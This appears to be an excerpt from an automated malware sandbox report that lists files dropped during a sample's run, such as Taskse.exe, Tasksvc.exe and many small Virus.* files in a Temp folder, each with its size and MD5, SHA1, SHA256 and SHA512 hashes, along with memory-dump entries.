12badd2f8126dc1dd6e1f214be44bd428921bd08f03958cb5ad9e5df330f11a19af34ca9fc36f39d43bc27a01184268ee70df99ef785197424d688a438df6947

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
19KB

MD5
4786de4a0ff255f707708c9732c9ec55

SHA1
a6dadbfd3c280b46d16d72cdab86f32e1389cb04

SHA256
b003b8082022234e8c783ab7d6bdc8f79fb470fd17eef128e0d7b5d55b3dcf76

SHA512
0006ed08d45b9e1710068c33d81a062311617089a933b0198939c3ca24003d0b85e833599ada2d74f0a4cd9300fc92f1982b9e4962e97e656a3d40a7edced939

Download Submit
C:\Users\Admin\AppData\Local\Temp\Taskse.exe

Filesize
20KB

MD5
97f52f18a3626227d61dc86c3e7162a5

SHA1
6a4bb79253858325e952f3a41df406811dcb4448

SHA256
a4abc5f526d6d047f0099ceba04a82653eaa4739b9cd3b083ff67497a8b6896f

SHA512
a8d312c4103d5220a8048f63efa37fa9347960cef2e4f50fdc0b93235dc387b2c6779b6b08871104a0add6c73b05db90e25aef27c0b80e753402c5c7c08aa33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tasksvc.exe

Filesize
10KB

MD5
0ae0ce4c291c2cf6e1f241a95faa98a1

SHA1
0071093e577bba14f37e17c700885ed72393cb84

SHA256
ffbf5a2f5052dd7cf652c12df320609d147f18b2560e5a0787fc2eed08a4d1f8

SHA512
a6c8f647aeac1f13c857318c79c506dc87f24a2f47de5f7fedec5b4f247688a4a7e378ba6ce73f8d13687051d951182fba9275c35e17766f847a09544d25e928

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.bin

Filesize
16B

MD5
6075621e5c993eb9431c2ef47d39f79a

SHA1
77393a0c8d152114beaf76964b9f469a2b4724e0

SHA256
3ee95ce23cd7444ae3f12da9c9a4a274e2cb4e40eaee0dde1f84d5e7cd46dc4d

SHA512
31fa847c379b03752a0ac911e5057af1a68918a18a7e7cb1504c098745017f4c54e717ed68aa542dfcb3ecbaa8098af73ae736b5378af0236e05d577c002d0b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.chk

Filesize
16B

MD5
f13bf9649cb84c32a2ef63ba13a20261

SHA1
ace17651bc58bc53f7891531d5cc1b660e0c263f

SHA256
689c028b42ecb3ceb39e78749cc813dafd460454e9b7c2d3a636af02d3499b3f

SHA512
7fe50fe92179424a5371a9ee12a631ded47bcdc84cde8b389952cc696028b7be38d2907ae4fd60f59e6aedb82fa3cad02c8b83ba6a0d62ada80a555b0102da18

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.cmd

Filesize
17B

MD5
717e20577a11fc612ea705cabb514fe7

SHA1
3b0ed4e2211eaebc626637097a573b9ae68261b4

SHA256
fcb351c289a0349508f0e84b7157fddf65e1ea698631b426d8dc1e61e191db24

SHA512
ff8d5b83f73f90f888e968f5eb0d8c5481c147c64ef27bfc4691f525b255f80252ee3c8b17bd51a7039a940fb3c3caeff1ec36c39e8df71b34f42f499b1ec8b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.com

Filesize
17B

MD5
76e4553d708db81c689e6748e97524c5

SHA1
959dacb7c925c2b9361a0709f7eaf877610a9594

SHA256
643ce99e957097f29abc192626036baf2616fd13e288c648f0044851c0d1fc7a

SHA512
c14a36b385139ec505e0a31194184e84aa946b041cdb85e4a23a67c37acd30f22b88c6bde398949df69208836bbcd03106cff45cace4abdafb703f146cf45dbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.dat

Filesize
16B

MD5
07e27b3d313a8a760646e0bdcd1d1143

SHA1
43f399d20f1e8efb5a3de99c11e409d57739bf15

SHA256
6bcbab900c6cedfb740db7995ad4aecae686bdf35a9588ed74bc2be701ee8159

SHA512
95815820cb650b4e6b9b355b6b60e58453331795ddde464ad8580cd8b9e67963d8005787db8b542cca5b90e8bdd06d86f2cc4aa1fc577c1352d6767cfc9b977b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.dll

Filesize
16B

MD5
3781c0582135bcbbcbf42b9cc9d405e0

SHA1
04fcec22d895e806918426811b446549ca89d2a7

SHA256
13fa08d7e2d90c199636e74694dc3939146efbb900f1a6043758b7afe06d2b72

SHA512
df6f058a286aee3d0bbac625b1802df78c3318470bacdd01c4058777fa88770f5e8f014459c6849fd918c75142456e7a42e46a50c7dee48fcb061b7dd22db694

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.exe

Filesize
16B

MD5
53024381d304c324b4fffb3d62ae3bf4

SHA1
b6fb1c40883e603eb0509ae5c6fcb815cf570147

SHA256
a9cea7e90febff9a67ff837a42405b4cd65f9d1766bd08164e6ad4b2d9ab4b6f

SHA512
35f3363716431874e0c042dcac9f7c6ff9d24af08fc9c76edc74dc9eb7ce77e39c585e718194e62bb237db722094a9eb976594a5f1e787ed6fa973c18ebd9269

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.inf

Filesize
15B

MD5
2467fa53dd46a2ac23583e2088eda0c9

SHA1
da9b54fc14afa03cc12c20333b574eda6ed947b0

SHA256
dcc59d793e6646c6ea30706e1f310c8aa9eb2bfd706d58ab1ecb014cacf9d80e

SHA512
1991fd94ad56dd5145bb8673e7c8d58ce0fde2e58a9e22e7f04d9df3e33062934098dce2989e2a7dc035856720198b71c4e5ce21c7df774a99e0fbc7bb431159

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.ini

Filesize
15B

MD5
000a8726e0ca3e260e6dc7b71e481847

SHA1
6435fbf910a004f7c1218aff221abdff2f350d54

SHA256
e88e5012af9d817efd4bddc109f328f94bde9c97c13576d7bb891bcda55f4e40

SHA512
06d9fc8d35efbac7cb14c2038243f264d79af7f7641247f8dc94c01aaa0c2ea75c32c9108c6e4b4101398c52db9d444e21508e76cb3c040eb884552dd8aee4d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.iso

Filesize
17B

MD5
c3d85f08e8d3c547c12cd0488c72d750

SHA1
c8702ac2ae9365de45bdf8811313fafc95809a1e

SHA256
a50d47295a8e2b53245dc44eacd7287a63dc37cbac710f330e0826f410347795

SHA512
e2366ef1cdbbb9e2db2040d739eb6079bda99da96bf2b67da12d9078a7e845fff6a062b522518435220b4fa78fe0f53345f504af754c27cc237d26f9aed396e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.jar

Filesize
17B

MD5
7d5f7ada3098605932ccb3165f7869ff

SHA1
7eb999e9fd9bce59dff144133ded622f1442846a

SHA256
39e9d0dcce8d17cc6a54b76d40d9f93f0f187018e5757369c7cfc1e7f4439956

SHA512
53c25e30534ea1ad969da5c4871b55bf06be68c59631eed0b1b3127e9411c1a8fd71f39e2e7773542a933f9777cd7e322aafd4f691bcf7414acb079739879a13

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.lib

Filesize
16B

MD5
01174666a7fdfbf673fb2f64f8389d5f

SHA1
d5dbf93830bcccd94cc9d829dac8d6114c2486b6

SHA256
3b94a7a90a4867012596470b10ed410d08c76090e60c168e595c9273da5edf71

SHA512
7186a5a8ed2cf0e057057d5c52eb411758259ee3b20b4631d83a44e2c6d241a14b9523f5ad0be3a94e8ae09c13e807e1a1dd5a37575005c9bfd523efb6abc78e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.ocx

Filesize
16B

MD5
5c76f76c5ebb84f1a387fbb1a7820679

SHA1
bed18230fe86bfabfde8f51ed2c90fdbd5cef635

SHA256
f9c82bf8aaef7952204a9fb23f2083ee5f35b28107b89488702ae88d2833791d

SHA512
2944448c042be2fbeaa87da0acb0146bf3d81850bc8f63a5386b1c091d12f72c8c672806784247191da9b788d2f185f9abed64df7fed4806aa7f5cc4ab32ff22

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.reg

Filesize
16B

MD5
25102778dea54840590ec4efe8899021

SHA1
a65270dd2424da74993da4e235342962e298ff44

SHA256
badce3e4bbe9bf58d6699fe15a8187235b2131aec934b31ea95a9a67199a4be6

SHA512
9b0f875661e3376217da09d09b1846fd26da9b404f07cbf258656a363bed6b381f26a9220af5c260615a1d4b3b88522b9900bb4b24828339fe671870b3dc603c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Virus.sys

Filesize
16B

MD5
2ad5da2d4f33185645170fedb02c66a5

SHA1
5b13a9af4b8d5b4206a184537f4a6f60a4ccd08a

SHA256
4a7385f59647ef73f7a0f7ca253d26b1af6ccef603611af8aecbbe4891c576a8

SHA512
76cfbf32923394750f98fbd58a49fd8f6b39930c8d3074eaf93ba3691bd007b88e2e43f2182b71f797177f4da2565bca024cc31bd237f25f4053f19cab0abf4e

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
1KB

MD5
5d1d96c3d7894fc85ed2e115f1436942

SHA1
b0c0a463ca7c9f4950355c47d008fe9143b89adc

SHA256
56beea639203194dfa1de0067d7b9e272bfd0ecf7fe57ec9c18612c174e459c7

SHA512
dbd66a88ac7d8167099f500febf76f79faa7e7274a402a56ab74ae707eddf074b68ff679554c148dcd4d8860ae1ea93bab777c07281caf6ca1b67a97b9727c1e

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
3KB

MD5
759ba1db829c9790b821f177438364a3

SHA1
bc5da78e49e3a89503769dad24f9c37f2229529f

SHA256
0f77653537b2de6a1a9cbd49caf8f529f1818fab942f50beb4f8a2892e767bb1

SHA512
34e295b3ba50f8292066be8a3279478c3493aa53fe463de349010c398c3e15956ac931fa4f2e0e1c535bcbcb0676db1630e38defa380181cb657641fdca3b638

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
4KB

MD5
92d3194b56f9514f78ea206c4f4b70d9

SHA1
ad669847625e40eb3d613a97560850a45a805e47

SHA256
208dd04ceb4130d8c82ed617fc149876365f8798c7eb8a78ac72bdda5309b35b

SHA512
aa6eea322927556113c749191c10830206f77a9185839f38503eff05aaa119c9da0944d42e6e15b0fed6938f2c2c31fdfd7b7c95c0de12008c3c0eecfa9e9e2b

Download Submit
C:\Windows\Debug\WIA\wiatrace.log

Filesize
7KB

MD5
88742c86c2db2375481b2040167a382e

SHA1
7068a40c99b721d7aa517a2d80928ddb96d10137

SHA256
14fc742345c4ff8a6459d2069ae47bdf408416faa1574b0be652bf4c84a6ad54

SHA512
5eb9a237d1dfd2cfe0b92665e2efff9a5a02088303acfe24ed263d8c41461ef3737747b8cf3b070e1b1a9b6738db4958568a8e3a4bde1aa675e01ac93936c28d

Download Submit
memory/3112-350-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3112-263-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download